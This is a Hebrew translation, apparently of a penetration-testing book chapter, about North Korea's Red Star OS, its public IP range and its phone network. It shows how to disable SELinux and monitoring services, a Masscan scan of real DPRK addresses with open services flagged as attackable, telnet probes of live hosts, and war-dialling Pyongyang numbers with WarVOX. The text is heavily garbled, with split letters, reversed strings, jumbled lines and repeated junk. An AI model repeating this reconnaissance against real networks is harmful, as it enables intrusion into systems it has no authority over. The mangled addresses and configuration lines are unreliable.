‫ס קירה כ ל לית‬
‫בעוד שהרפו ב לי קה העממית הדמו קר טית ש ל קוריאה )‪ (DPRK‬מ שתמ שת ב ט כנו לוגיות‬
‫מיו באות שונות ) קים ג'ונג‪-‬און הוא מעריץ גדו ל ש ל אפ ל(‪ ,‬לאו כ לו סייה ה כ ל לית אין כ ל‬
‫כך מז ל‪ .‬מע ט מאוד ח ברים ב ח ברה נהנים מגי שה ב לתי מוג ב לת לאינ טרנ ט )אם כי זה‬
‫מ שתנה עם הי בוא ש ל ט לפונים ניידים ב שו ק ה ש חור מ סין(‪ .‬רו ב האנ שים שי ש להם‬
‫גי שה ל ט כנו לוגיית מ ח ש ב נא לצים לה שתמ ש במער כות הפע לה ומ כ שירים מאו שרים‬
‫ומוג ב לים לאינ טרנ ט נגי ש באופן חופ שי ב שם ‪ Kwangmyong ( ),‬שפירו שו " ק ל" או‬
‫" בהיר" באנג לית‪.‬‬
‫זהו גן מו קף חומה ונפרד ל ח לו טין מהאינ טרנ ט הצי בורי כפי שאנו מ כירים אותו‪ .‬מיותר‬
‫לציין ש לא תמצאו כאן שום ד בר בי קורתי ע ל קים או ע ל מ ש טרו‪ .‬אינ טראנ ט זה נגי ש‬
‫במ קומות שונים ‪-‬אוני בר סי טאות ומו סדות תר בות ‪ -‬ו ל כאורה זמינה גם באמצעות‬
‫חי בור ב חיוג עם צפון קוריאה‪ -DPRK .‬לי ש ה קצאה מ ש לה ש ל טוו ח ‪22 (1,024 /‬‬
‫מאר חים( ש ל כתו בות ‪IP‬צי בוריות‪ ,‬אם כי א לו ב קו שי מאו כ ל סות‪ .‬למרות זאת‪ ,‬ה‪PI-‬‬
‫מו קצים באופן שמרני ביותר ; לדוגמה‪ ,‬לאוני בר סי טת פיונגיאנג למדע ו ט כנו לוגיהי ש‬
‫כתו בת א חת ב ל בד‪.‬‬
‫מער כות הפע לה‬

‫‪ DPRK‬מו כרת מער כת הפע לה צפון קוריאנית "ר שמית" ב שם ‪ )Red Star‬בגר סה ‪3.0‬‬
‫בזמן ה כתי בה(‪ Red Star .‬מגיע ב שני טעמים ‪ -‬שו ל חן ע בודה ו שרת ‪ -‬ו שניהם מ בו ס סים‬
‫ע ל ‪ Fedora Linux‬עם לו ק ליזציות ש ל קוריאה‪ .‬שניהם נועדו להיות מג בי לים מאוד‬
‫מהי סוד )אם כי בדר כים מע ט שונות‪ ,‬א ב ל נגיע לזה(‪ .‬אני אהפוך את שתי הגר סאות‬
‫לזמינות באמצעות טורנ טים מהאתר ש לי אם תרצה ל ש ח ק איתן‪.‬‬
‫‪Red Star Desktop 3.0‬‬

‫קודם כ ל‪ ,‬בואו נ ב חן את ‪ Red Star Desktop,‬כו ל ל הא ק סצנ טריות ש לו ו כיצד לנצ ל‬
‫אותו‪ .‬איור ‪ 9.1‬מציג כיצד נראית מער כת ההפע לה בעת את חו ל; זה פוע ל כאן‬
‫‪ -VMWare.‬ב‬
‫איור ‪ 9.1:‬שו ל חן הע בודה ש ל כו כ ב אדום‪.‬‬
‫אפ שר ל ס לו ח ל קוראים ע ל כך שהדמיון ש לו ‪ -OS X‬ל ש ל אפ ל‪ ,‬ש למען ההגינות‪ ,‬הו שג ממ שיפה‪.‬‬
‫אני‪ ,‬למ ש ל‪ ,‬מוצא את ה קוריאנית ש לי קצת ח לודה‪ ,‬אז הצו הרא שון ש לנויהיה ל ק ב ל את הד בר‬
‫באנג לית כדי לא להתיי ח ס כ ל הזמן ‪ -Google Translate.‬ל ל שם כך‪ ,‬רא שית ע לינו ל ק ב ל מע טפת‪,‬‬
‫כפי שמוצג באיורים ‪ 9.2‬ו ‪-9.3.‬‬
.‫ ק ב לת מע טפת‬9.2: ‫איור‬
.‫ פגז‬9.3: ‫איור‬
‫ה ק לד את הד ברים ה באים‪ ,‬המוצגים באיור ‪9.4.‬‬
‫איור ‪ 9.4:‬ע בודה מהירה ו ק להיותר באנג לית‪.‬‬
‫לא חר מ כן את חו ל מהיר ותראה מ שהו כמו איור ‪9.5.‬‬
‫איור ‪ 9.5: Red Star Linux‬באנג לית‪.‬‬

‫הר בהיותר אוה ב את זה!‬
‫ההנ חה שהמפת חים ע שו לג בי הא ב ט חה וה ש למות ש ל מער כת ההפע לה היא ש לא ניתן‬

‫למ שתמ שים לה שיג הר שאות שור ש ו ל כן לאיו כ לו להתמודד עם ב קרת הגי שה הדי ס קר טית‬
‫)‪ (DAC‬שמ ספ קת ‪ SE Linux,‬כמו שונות שירותים א חרים לא נעימים הפוע לים מתוך עין‬
‫לני טור המ שתמ שים ופעי לותם‪ .‬ההנ חה הזו ש קרית‪ ,‬כפי שאדגים ) שימו ל ב שמוד ל הא ב ט חה‬
‫הזה שונה ל ח לו טין ‪-Red Star Server 3.0,‬מ ש בו הר שאות שור ש ניתנות כ ברירת מ חד ל‬
‫‪-SE Linux‬ו מו ק ש חת כדי למנוע את ה ש בתתו‪ .‬א ב ל קודם כ ל‪ ,‬ד בר רא שון(‪.‬‬
‫כדי להעני ק לעצמך אי שורי שור ש‪ ,‬הפע ל את הגדרת ה שור ש ש ל התו כנית‪ ,‬כפי שמוצג באיור‬
‫‪9.6.‬‬
‫איור ‪9.6:‬הפע ל הגדרת שור ש‪.‬‬

‫זהי ב ק ש ממך סי סמת ‪su .‬א שר זאת‪ ,‬כפי שמוצג באיור ‪9.7.‬‬
‫איור ‪9.7:‬הזן את האי שורים שיצרת ע בור המ שתמ ש ש לך‪.‬‬

‫ב ש ל ב זה‪ ,‬אתהי כו ל להע לות את ‪-privs‬ה ש לך ל שור ש באמצעות ‪ su,‬כפי שמוצג‬
‫באיור ‪9.8.‬‬
‫איור ‪ 9.8:‬כעתי ש לנו גי שת שור ש‪.‬‬

‫רא שית‪ ,‬ע לינו לה ש בית את ‪ SE Linux‬כדי לה ש בית את ‪-DAC,‬ה כפי שמוצג באיור ‪9.9.‬‬
‫איור ‪9.9:‬ה ש בת ב קרת גי שה לפי שי קו ל דעת‪.‬‬

‫י שנם שירותים א חרים הפוע לים שיפעי לו מ חד ש את המער כת אם תנ סה ל שנות‬
‫מער כות מ סוימות‪ .‬הם נועדו גם ל סמן ק בצים כדי שממ ש לת צפון קוריאה תו כ ל‬
‫לע קו ב א חר מ קורם‪ .‬אתה תרצה להרוג גם את א לה )ראה איור ‪9.10).‬‬
‫איור ‪9.10:‬ה ש בת תה לי כי ני טור‪.‬‬

‫ב ש ל ב זה נו כ ל לה סת כ ל מע ט מ ס בי ב‪ .‬הפע ל את דפדפן ברירת המ חד ל‪ ,‬שהוא או‬
‫שדף ה בית ש לו הוא ‪10.76.1.11,‬‬ ‫הוא‬
‫מ חד ש‬ ‫כאןתג‬
‫זהן ר ק‬
‫שמעניי‬ ‫י" ל מה‬
‫באנג לית(‪.‬‬ ‫אב‬
‫של‬‫‪Firefox,‬‬ ‫‪naenara‬ש ל‬
‫)"המדינה‬ ‫נ קרא גר סה‬
‫שהיא ל לא ספ ק כתו בת ‪ IP‬שאינה ניתנת לניתו ב‪ .‬ה סי בה ל כך היא ‪ -Red Star‬ש מיועד‬
‫להתנה ל בתוך הגן המו קף חומה וזו כתו בת ה‪ PI-‬ש ל עמוד ה בית ש ל האינ טרנ ט‪ ,‬ש לצערי‬
‫איננוי כו לים לראות מ כאן‪ .‬מנוע ה חיפו ש המוגדר כ ברירת מ חד ל ע בור הדפדפן הוא גוג ל‬
‫קוריאה‪.‬‬
‫כעת‪ ,‬נו כ ל להו סיף מאגר מ קומי ו להת קין את כ ל ה ח בי לות האופציונ ליות )אם נרצה‬
‫לע שות זאת(‪.‬‬
‫‪Red Star Server 3.0‬‬

‫בזמן שיתוף אותו ב סי ס קוד‪ ,‬לגר סת ה שרת ש ל מער כת ההפע להי ש מוד ל א ב ט חה‬
‫שונה ל ח לו טין‪ .‬אתה מ ק ב ל הר שאות שור ש מ חוץ ל קופ סה; עם זאת‪ ,‬מ שתמ ש ה שור ש‬
‫אינוי כו ל לה ש בית את ‪ SE Linux‬באותו אופן שהואי כו ל‬
‫בגר סת שו ל חן הע בודה‪ .‬ראה איור ‪9.11.‬‬
‫איור ‪ 9.11:‬מ סך הת קנת לינו ק ס ש ל כו כ ב אדום‪.‬‬

‫לא חר מ כן תו כ ל ל ב חור מנה ל שו ל חן ע בודה‪ ,‬כפי שמוצג באיור ‪9.12.‬‬
‫איור ‪ 9.12‬ב חר במנה ל שו ל חן הע בודה‪.‬‬

‫שרת שו ל חן הע בודה הוא קצתיותר מינימ לי מ שו ל חן הע בודה‪ .‬איור ‪ 9.13‬מציג אותו‬
‫מעו בד באנג לית‪.‬‬
‫איור ‪ 9.13:‬שו ב‪ ,‬עדיף לע בוד באנג לית‪.‬‬

‫י שנן מ ספר דר כים לה ש בית את ‪SE Linux,‬אך לא תו כ ל ל שנות את אפ שרויות טוען‬
‫האת חו ל או את ק בצי התצורה ש ל ‪SE Linux.‬הגי שה ה טו בה ביותר היא להע לות את‬
‫ק בצי ‪ VMDK‬כאמצעי א ח סון ש ל מער כת ההפע לה ו ל שנות אותם מ שם או‪ ,‬אם‬
‫הת קנתם ע ל מת כת ח שופה‪ ,‬לאת ח ל עם מער כת הפע לה א חרת ו לע שות את אותו‬
‫הד בר‪ .‬כדי לה ש בית את ‪ SE Linux‬לצמיתות‪ ,‬ע ליך ל בצע את הפעו לות ה באות ל קו בץ ‪/‬‬
‫‪etc/selinux/config :‬‬
‫‪ #‬קו בץ זה שו ל ט במצ ב ש ל ‪ SELinux‬במער כת‪.‬‬
‫=‪# SELINUX‬י כו ל ל ק חת א חד מ ש לו שת הער כים ה באים‪# :‬א כיפה ‪ -‬מדיניות הא ב ט חה ש ל ‪SELinux‬‬
‫נא כפת‪ # .‬מתירני ‪ - SELinux‬מדפי ס אזהרות במ קום לא כוף‪ # disabled - .‬לא נ טענת מדיניות ‪SELinux.‬‬
‫‪=XUNILES‬מתירני =‪# SELINUXTYPE‬י כו ל ל ק חת א חד מ שני הער כים ה באים‪ # :‬ממו קד ‪ -‬ר ק דמוני‬
‫ר שת ממו קדים מוגנים‪.‬‬
‫‪# strict -‬הגנת ‪ SELinux‬מ לאה‪.‬‬

‫‪=EPYTXUNILES‬ממו קד‬
‫ב ש ל ב זה‪ ,‬אתהי כו ל להת קין מה שאתה רוצה‪ ,‬כמו בגר סת שו ל חן הע בודה‪.‬‬

‫בעוד שמ ש ח ק עם מער כת ההפע לה ‪Red Star‬הוא תו בנה חינו כית ל סוג ה טו ט לי טריות‬
‫שהאנ שים שם חיים איתה מדייום‪ ,‬זה לא נותן לנו הר בה תו בנה לג בי הפרי סה ש ל‬
‫ט כנו לוגיית הר שת‪ .‬ש ק לתי לנ סוע לצפון קוריאה כתייר ו למצוא דרך לג שת לר שת האינ טרנ ט‬
‫ש להם כדי שאו כ ל למפות אותה כמו שצריך‪ ,‬א ב ל ש לו שים שנה ל ש בור ס לעים זה לא‬
‫הת קופה ה טו בה ש לי‪ .‬אז אם מי שהו ש קורא את זה רוצה להתנד ב למ שימה ה ספציפית‬
‫הזו‪ ,‬אתהי כו ל ליצור איתי ק שר דרך ההוצאה לאור‪.‬‬
‫ה ש ל ב ה בא הוא לה סת כ ל ע ל כתו בות האינ טרנ ט הפונות לצי בור ש להם‪.‬‬
‫מר ח ב ‪IP‬צי בורי צפון קוריאני‬

‫ש ט ח ה‪ PI-‬ש ל ‪ DPRK‬מנוה ל ע לידי ‪ Star Joint Venture Co LTD‬במ חוז ‪Potong-gang‬‬
‫‪ Ryugyong dong‬והוא מוזרם א ל עמוד ה שדרה ש ל ‪ CNCGroup‬ב סין‪.‬‬
‫לצפון קוריאה הו קצה מר ח ב ‪ IP /22 ,‬כ לומר‪:‬‬

‫‪175.45.176.0/22‬או ‪175.45.176.0-175.45.179.256‬‬
‫י ש לו פו טנציא ל ל כ‪ 000,1-‬כתו בות ‪ IP.‬מיותר לציין שאין קרו ב להר בה כא לה ב שימו ש‪.‬‬
‫באמצעות ‪Masscan,‬נו כ ל להפעי ל סרי קתיציאה מהירה ומ לו כ ל כת תוך כ שעה שתיתן‬
‫לנו תמונת מצ ב בזמן ש ל מה שפוע ל‪:‬‬
‫מאר ח‪175.45.178.154 () :‬יציאות‪ 5800/open/tcp//// :‬מאר ח‪() :‬‬

‫‪175.45.178.154‬יציאות‪ 6002/open/tcp//// :‬מאר ח‪175.45.178.154 () :‬‬
‫יציאות‪ open5tp //// /:‬מאר ח‪175.45.178.131 () :‬יציאות‪open/tcp//// :‬‬
‫‪ 36697/‬מאר ח‪175.45.178.133 () :‬יציאות‪ 2105/open/tcp//// :‬מאר ח‪:‬‬
‫‪175.45.178.178.154‬יציאות ‪ (4:60) /open/tcp////‬מאר ח‪() :‬‬
‫יציאות‪ 5900/open/tcp//// :‬מאר ח‪175.45.178.178. ) :‬יציאות‪tcp//// :‬‬
‫‪ 5804/open/‬מאר ח‪175.45.178.154 () :‬יציאות‪ 111/open/tcp//// :‬מאר ח‪:‬‬
‫)( ‪175.45.178.133‬יציאות‪ 53272/open/tcp//// :‬מאר ח‪() :‬‬
‫יציאות‪ 22/open/tcp//// :‬מאר ח‪175.45.178.154 () :‬יציאות‪tp/open // :‬‬
‫‪ 5802/open/‬מאר ח‪175.45.178.133 () :‬יציאות‪2103/open/tcp//// :‬‬

‫יציאות‪ 53/open/tcp//// :‬מאר ח‪() :‬‬
‫‪ 53/open/tcp////‬מאר ח‪() :‬‬
‫‪175.45.176.9‬‬
‫יציאות‪:‬‬
‫‪ 25/open/175.45.178.55‬מאר ח‪() :‬‬
‫יציאות‪tcp//// :‬‬
‫‪175.45.178.154‬יציאות‪ 5902/open/tcp//// :‬מאר ח‪175.45.178.154 () :‬יציאות‪:‬‬
‫‪ 5904/open/tcp////‬מאר ח‪175.45 .178.154 () :‬יציאות‪3128/open/tcp//// :‬‬
‫‪175.45.178.133‬יציאות‪ 2107/tcp/open/ / :‬מאר ח‪175.45.178.154 () :‬יציאות‪:‬‬
‫‪ 6003/open/tcp////‬מאר ח‪175.45.178.154 () :‬יציאות‪5901/open/tcp//// :‬‬
‫מאר ח‪175.45.178.154 () :‬יציאות‪ :‬פתו חות ‪ tcp////‬מאר ח‪175.45.176.15 () :‬‬

‫‪ 53/open/tcp////‬מאר ח‪() :‬‬
‫‪175.45.176.8‬‬
‫יציאות‪:‬‬
‫‪175.45.178.154‬יציאות‪ 3306/open/tcp//// :‬מאר ח‪175.45.178.154 () :‬יציאות‪:‬‬
‫‪ 6001/open/tcp////‬מאר ח‪175.45 .176.73 () :‬‬
‫‪175.45.178.129‬יציאות‪ 23/open/tcp//// # :‬מ ס קאן נע שה ביום ש לי שי ‪27‬‬
‫ב ספ טמ בר ‪12:20:31 2016‬‬
‫ק ב לת סרי קות אמינות ש ל טוו ח זה היא כא ב בהת ח ש ב ב כך שאי כות ה קי שור ‪ -DPRK‬להיא ה כ ל מ ל בד אמינה‪.‬‬
‫לדוגמה‪ ,‬אנויודעים ש שרת האינ טרנ ט ש ל אוני בר סי טת קים אי ל סונג )‪www.ryongnamsan.edu.kp/univ‬‬
‫‪(http://‬נמצא ב ‪-175.45.176.79,‬א ב ל זה לא מופיע ב סרי קה הזו למרות שהיה ער באותו זמן‪.‬‬
‫עם זאת‪ ,‬זה אינפורמ טי בי לג בי מה ש לא מ סונן מהאינ טרנ ט‪.‬‬

‫י ש שרת ‪VNC‬י שן פגיע להת קפות שונות ב ‪-175.45.178.154:‬‬
‫‪ root@wil:~# telnet 175.45.178.154 5900‬מנ סה ‪175.45.178.154...‬‬
‫מ חו בר ל‪.451.871.54.571-‬‬
‫תו ברי חה הוא ‪'^]'.‬‬
‫‪ RFB 003.008‬שרת ‪ MySQL‬ב כתו בת ‪175.45.178.154.‬‬
‫יציאת ‪ Telnet‬ע בור נת ב סי ס קו ב כתו בת ‪root@wil:~# telnet 175.45.178.129‬‬

‫‪ 175.45.178.129.‬מנ סה ‪175.45.178.129...‬‬
‫מ חו בר ל‪.921.871.54.571-‬‬
‫תו ברי חה הוא ‪'^]'.‬‬
‫אימות גי שת מ שתמ ש‬
‫שם מ שתמ ש‪:‬‬
‫גר סה לא מאו ב ט חת ש ל פרו ק סי דיונון ב‪) 451.871.54.571-‬איור ‪9.14):‬‬

‫איור ‪ 9.14: Proxy‬לא מאו ב ט ח ש ל ‪Squid.‬‬

‫י שיציאות ‪ RPC‬פתו חות ודמוני ‪ SSH‬מגוונים המ שתמ שים באימות סי סמה‪.‬י ש‬
‫אפי לו שרת ‪ webmin ,‬כפי שמוצג באיור ‪9.15.‬‬
‫איור ‪ 9.15:‬ממ ש ק ‪Webmin.‬‬

‫שימו ש ב שרת ‪-DNS‬ה ב‪61.671.54.571-‬ימנע את כ ל ה ח ל טות ה שמות ע בור הדומיין ‪PK.‬‬
‫ברמה הע ליונה‪.‬‬
‫ב סך ה כ ל‪ ,‬הייתי מצפה שה טוו ח הזהיהיה הר בהיותר נעו ל ממה שהוא‪ ,‬מ כיוון שי ש כאן‬
‫אפי קי הת קפה שונים )אם א חד מהם נו טה כ ל כך(‪.‬‬
‫עם זאת‪ ,‬צפון קוריאה או לא‪ ,‬נ טעה בצד ש ל ה חו ק ה בינ לאומי ו לא ניתן לפיתוי לג בור ע לינו‪.‬‬
‫א ל תתן לפיתוי לה שת ל ט ע לינו‪.‬‬
‫מער כת ה ט לפון הצפון קוריאנית‬

‫חיוג לצפון קוריאה הוא מ סו בך במ קרה ה טו ב‪ .‬רו ב מ ספרי ה ט לפון אינם נגי שים‬
‫י שירות ודור שים ממך לע בור דרך המפעי ל ב ט לפון ‪+850 2 18111 (850‬הוא‬
‫קוד המדינה ע בור ‪ DPRK‬ו‪ 2-‬הוא פיונגיאנג(‪ .‬זה עו בד ל שני ה כיוונים‪ ,‬עם רו בם‬
‫קווים שאינם מ סוג לים להת ק שרי שירות ל שאר העו לם‪.‬‬
‫מ ספרי ט לפון ‪ -DPRK‬ב שי כו לים ל ק ב ל שי חות בינ לאומיות )ו להפך‪,‬‬
‫להת ק שר מהארץ ל לא הג ב לה( הת חי לו תמיד במ ספר ‪381,‬‬
‫י שירות בע ק בות קידומת ה חיוג‪ .‬למ ש ל‪ ,‬שגרירות ברי טניה ב‬
‫לפיונגיאנגי ש את מ ספר ה ט לפון ‪ +850 2 381 7982.‬מ ספרים שאפ שר ל חייג‬
‫בינ לאומי לאי כו ל ל חייג מ קומי; ל כן‪ ,‬מ קו ב ל שארגונים כא לה עו שים זאת‬
‫י ש שני מ ספרי ט לפון עם ה קידומת ‪ 381‬במ קום ‪382.‬‬
‫לד ברי מר רייונג וון‪ ,‬מנה ל המ ח ל קה לי ח סים בינ לאומיים‪,‬‬
‫מ שרד הדואר והת ק שורת‪ ,‬מת כונת המ ספור הנו כ חית ש ל‬
‫צפון קוריאה נראית כך‪:‬‬
‫ר שימת הה קצאות ב‪1102-‬‬
‫אזור חיוג אורך מ ספר ל קו ח שם עיר שם מ חוז‬

‫יונג‪2‬‬
‫יאנג פיונגיאנג‬ ‫‪11‬‬
‫פ‬
‫יונג‪2‬‬
‫פ‬
‫‪ 3‬ספרות‬ ‫יונג‪2‬‬
‫פ‬
‫‪ 4‬ספרות‬ ‫יונג ‪2‬‬
‫יאנג פיונגיאנג‬‫‪381‬‬‫פ‬
‫‪ 13‬ספרות‬ ‫יונג ‪2‬‬
‫‪ 13‬ספרות‬ ‫יונג ‪2‬‬
‫‪ 13‬ספרות‬ ‫יונג ‪2‬‬
‫‪ 13‬ספרות‬ ‫יונג ‪2‬‬
‫‪ 13‬ספרות‬ ‫יונג ‪2‬‬
‫‪ 7‬ספרות‬ ‫‪195‬‬
‫יונגיאנג פיונגיאנג‬
‫פ‬
‫‪ 6‬ספרות‬ ‫‪31‬‬
‫יונג סונג דרום פיונגאן‬
‫פ‬
‫‪ 6‬ספרות‬ ‫‪39‬‬
‫נמפו נמפו‬
‫‪41‬‬ ‫‪ 6‬ספרות‬ ‫‪Sariwon North Hwanghae‬‬

‫‪43‬‬ ‫סונגנים‬
‫‪45‬‬ ‫‪ 6‬ספרות‬ ‫חאג'ו הוואנגהה‬
‫דרום‬
‫‪49‬‬ ‫‪ 6‬ספרות‬ ‫‪Kaesong North Hwanghae‬‬
‫‪53‬‬ ‫‪ 6‬ספרות‬ ‫האמהונג דרום האמגיונג‬
‫‪57‬‬ ‫‪ 6‬ספרות‬ ‫וונ סאן קנגוון‬
‫‪61‬‬ ‫‪ 6‬ספרות‬ ‫‪Sinuiju‬‬
‫יונגן‬
‫צפון פ‬
‫‪67‬‬ ‫‪ 6‬ספרות‬ ‫‪Kanggye Jagang‬‬
‫‪73‬‬ ‫‪ 6‬ספרות‬ ‫צ'ונגג'ין צפון המגיונג‬
‫‪79‬‬ ‫‪ 6‬ספרות‬ ‫היי סן ריאנגנג‬
‫‪82‬‬ ‫קוואנ בו ק‬ ‫ראג'ין‬
‫‪85 29‬‬ ‫‪ 4‬ספרות‬ ‫רא סון‬ ‫רא סון‬
‫‪86‬‬ ‫סונ בונג‬
‫י שנן ש לו ש קידומות ש ל ר שת ס לו לרית‪:‬‬
‫‪ 0191:‬ר שת ‪Koryolink WCDMA‬‬
‫‪ 0192:‬ר שת ‪Koryolink WCDMA‬‬

‫‪ 0193:‬ר שת ‪SunNet GSM900‬‬
‫בנו סף‪ ,‬לאזור ה כ ל כ לי המיו חד ש ל ‪Rason‬י ש קידומת ש ל ‪ 3‬ור בים‬

‫יותר קווים נגי שיםי שירות בהת ח ש ב בע ס קים ה בינ לאומיים הפוע לים‬
‫שם ) בעי קר רו סית‪ ,‬סינית ודרום קוריאנית(‪.‬‬
‫מ ספר ט לפונים ס לו לריים מאפ שרים גם ק ב לת שי חות בינ לאומיות‪ ,‬למרות זאת‬
‫זה מ שהו שצריך ל ב ק ש ע לידי המנוי וא סור לו‬
‫אנ שים פר טיים‪ .‬ת שתית ה ס לו לר נ בנתה ומופע לת ע לידי ה‬
‫ה ח ברה המצרית אור ס קום בתור קוריו לינ ק; עם זאת‪ ,‬דוו ח כי‬
‫ממ ש לת צפון קוריאה ד חתה את הר שות לאורא ס קום לה חזיר רוו חים‬
‫מהפרוי ק ט ו בנו במ בר ‪2015‬הם טענו שהפ סידו למע שה‬
‫ש לי טה בת שתית והם חיי בים מי ליוני דו לרים ‪ -‬סיפור אזהרה‬
‫ל כ ל מ ש קיעי ט כנו לוגיה מת חי לים ש חו ש בים להתר ח ב לממ ל כת הנזירים‪.‬‬
‫אז כ ל זה מאוד מעניין‪ ,‬א ב ל מה זה מ ביא ל שו ל חן? חזרה ב‬

‫ימים לפני הרוו חה המ סי בית ש ל האינ טרנ ט‪ ,‬שרתי מ ח ש ב ר בים היו‬
‫מ חו ברים לר שת ה ט לפון‪ ,‬והדרך הי חידה לג שת א ליהם הייתה באמצעות‬
‫מודמים ב חיוג‪ .‬ציד א חר מודמים לת קיפה נ קרא חיוג מ ל חמה ו‬
‫כרוך ב שימו ש בתו כנת מ ח ש ב כדי ל חייג או טומ טית ח ל קי ענ ק ש ל מ ספרים וה ק ל טת מה‬
‫שנמצא ב קצה ה שני ש ל ה קו‪ ,‬בין אם זה קו לי‪ ,‬דואר קו לי‪ ,‬מ כ שיר פ ק ס‪ ,‬מודם‪ ,‬מר כזייה או‬
‫צ לי ל א חר‪ .‬זה היה הפופו לרי ביותר בארצות ה ברית‪ ,‬שם שי חות מ קומיות היו ב חינם‪.‬‬
‫ב ברי טניה‪ ,‬חי לופי ה ט לפון ה חינמיים היו בדרך כ ל ל ממו קדים‪ .‬התו כנה ש שימ שה בעי קר‬
‫כדי לה שיג זאת נ קראה ‪)Toneloc‬ראה איור )‪ 9.16‬והיא תייצר מפות מדהימות ש ל עד‬
‫‪ 10,000‬מ ספרים‪ .‬זה עדיין עו בד ב סדר היום‪.‬‬
‫איור ‪ 9.16:‬פ ל ט ‪Toneloc.‬‬
‫מה שיהיה כיף זה אם נו כ ל לע שות את אותו הד בר ו להת ק שר ל כ ל מ ספר נ כנ ס בפיונגיאנג‬

‫כדי למצוא מודמים‪ .‬מייודע מה אנ חנו ע לו לים למצוא? כמו בן‪,‬י ש בעיה ק לה עם גי שה זו‬
‫ב כך שהת ק שרות לפיונגיאנג היאי קרה והת ק שרות ל שם ‪ 10,000‬פעמים תהיה ב לתי‬
‫נ ס ב לת‪.‬‬
‫מה שאנ חנוי כו לים לע שות זה לה שתמ ש בפתרון שי חות ‪ VoIP‬כדי ל כ סות במידת מה את‬
‫הע לויות ש לנו ‪-‬הוא עדייןי קר והפתרון הזו ל ביותר הוא ‪ 0.2‬סנ ט לד קה )ו ל כן ל כ ל שי חה‪,‬‬
‫מ כיוון שזוי חידת ה שי חות המינימ לית(‪ ,‬א ב ל זה ה כי טו ב שאנ חנוי כו לים לע שות ‪.‬‬
‫זה עדיין נ שמעי קר וי כו ל להיות שזהי קרה‪ ,‬א ב ל ז כור שת חוי ב ר ק ע בור המ ספרים שעו לים‪.‬‬
‫ה בעיה הי חידה היא שאנ חנו לאי כו לים להע ביר שי חות נתונים דרך ‪ VoIP‬בהת ח ש ב ב בעיות‬
‫עם ד חי סה ) בין היתר(‪ ,‬אזי ש לג שת ל בעיה בצורה קצת א חרת‪ .‬במ קום לה שתמ ש במודם‬
‫ו חי בורי ה ק ל טה‪ ,‬התו כנה ש בה נ שתמ ש לו ק חת דגימת אודיו ש ל התגו בה ומ בצעת ע ליה‬
‫טרנ ספורמציה ש ל פורייה מהירה כדי שניתןיהיה לנת ח את ה טונים‪ .‬כ ל צ לי לים הנופ לים‬
‫בתדר מ סוים אנו רו שמים כמודמים‪ .‬תגו בות מודםי כי לו את‬
‫בתדירות מ סוימת אנו מת ח ברות כמודמים‪ .‬תגו בות המודםי כ ל לו את ‪-DTMFs‬הה טון‬
‫ה באים‪2250hz + 1625hz, 1850hz, 2000hz... :‬‬
‫למר בה המז ל‪ ,‬ב חור ב שם ‪ HD Moore‬ע שה ע בורנו את כ ל הע בודה ה ק שה ע לידי‬

‫יצירת ח בי לת תו כנה ב שם ‪ WarVOX.‬כ ל שע לינו לע שות הוא לתת ‪ -WarVOX‬לאת‬
‫פר טי ח ש בון ‪-VoIP‬ה ש לנו ואת טוו חי המ ספרים שאנו רוצים ל חייג‪ .‬א חר כך נ ש ב‬
‫א חורה ומ ח כים‪ .‬אתהי כו ל לה שיג אותו ב כתו בת ‪https://github.com/rapid7/warvox.‬‬
‫‪ WarVOX‬מ שתמ שת בממ ש ק אינ טרנ ט והד בר הרא שון שתצ טרך לע שות הוא להו סיף‬
‫את שירות ‪-VoIP‬ה ש לך למ סך ה ספ ק‪ ,‬כפי שמוצג באיור ‪9.17.‬‬
‫איור ‪9.17:‬תצורת ‪WarVOX.‬‬

‫אתה מו כן להת חי ל ע בודה חד שה )ראה איור ‪9.18).‬‬
‫איור ‪9.18:‬הו סף מ טרות ‪ -WarVOX.‬ל‬
‫הפ ל ט מאו ח סן ‪ -PostgreSQL,‬ב כך שנו כ ל לע בד אותו ב כ ל דרך שנרצה‪.‬‬

‫הפ ל ט מאו ח סן ‪ -PostgreSQL,‬ב כך שנו כ ל לע בד אותו ב כ ל דרך שנרצה‪.‬‬

‫במ קום לזרו ק ‪ 10,000‬שורות‪ ,‬בוא נ סת כ ל ע ל כמה נאג ט ס מו ב חר‪.‬‬
‫אמנם זוהו הר בה מ כ שירי פ ק ס‪ ,‬אך מע ט מאוד ספ קים )פ חות מ‪ (05-‬צוינו‪.‬‬
‫ספ ק ‪1:‬נת ב סי ס קו ל לא סי סמה‬
‫ספ ק ‪2:‬זרם ‪ PPPD‬ל לא סי סמה‬

‫……‬
‫‪wfyyui343wfyyui343wfyyui343wfyyui343wfyyui343wfyyui34‬‬
‫‪yyui343wfyyui343wfyyui343wfyyui343wfyyui343wfyyui343wfyyui343wfyyui343‬‬
‫‪ Carrier 3: BBS‬לאידוע עם אמנות ‪ ASCII‬גרועה )ראה איור ‪9.19).‬‬

‫איור ‪9.19:‬או לד ס קו ל!‬

‫עד כמה שזה מפתה ל ח קור את המ כ שירים ה ל לו עודיותר‪ ,‬נתנגד שו ב‪.‬‬
‫כן‪ ,‬זו צפון קוריאה ואני לא צפוי לה סגר בזמן ה קרו ב‪ ,‬א ב ל ה חו ק הוא ה חו ק וזה לא‬
‫מדריך איך להפר אותו‪ .‬במ קום בו אני גר‪ ,‬חיוג מ ל חמה ו סרי קתיציאות אינם חו קיים‪.‬‬
‫מ כ שירים ניידים מאו שרים‬

‫י ש ר ק סמאר טפון א חד ו טא ב ל ט א חד המאו שרים ל שימו ש בצפון קוריאה ‪ -‬שניהםי כו לים‬
‫ל שמ ש כדי לג שת לאינ טרנ ט המו קף חומה ש ל קוואנגמיונג‪ .‬כמו בן‪ ,‬נ טען כי א לה פות חו‬
‫באופן מ קומי בהנ חיית המנהיג הי קר ו ב ליווי התמונות ה ב לתי נמנעות ש לו בוד ק את‬
‫"המפע לים" ש בהם הם מיוצרים‪ .‬למע שה‪ ,‬שני המ כ שירים מיוצרים ב סין ומ סומנים‬
‫מ חד ש באופן מ קומי עם הדימויים הפ טריו טיים המ ב חי לים ש כעת אתם צרי כים לה כיר‪.‬‬
‫לפוןן‬
‫יהטצפו‬
‫לוג ה‬
‫הוא‬‫יאה(כנו‬
‫בר ב ט‬
‫שמדו קור‬
‫טענותצפון‬
‫שמי ש ל‬
‫הרה‬
‫למרות‬
‫‪DPRK.‬חצה‬
‫לאומי למ‬
‫בתוך‬
‫ההמנון ה‬
‫שאולשרשםל שימו ש‬
‫‪)Arirang‬ע‬
‫כם הי חיד‬
‫ה‪-‬ח )(‬
‫ה‬
‫קוריאנית טהורה‪ ,‬מדו בר ‪ -Uniscope U1201‬ב סינית מ חוד שת המריץ את גר סה ‪4.2.1‬‬
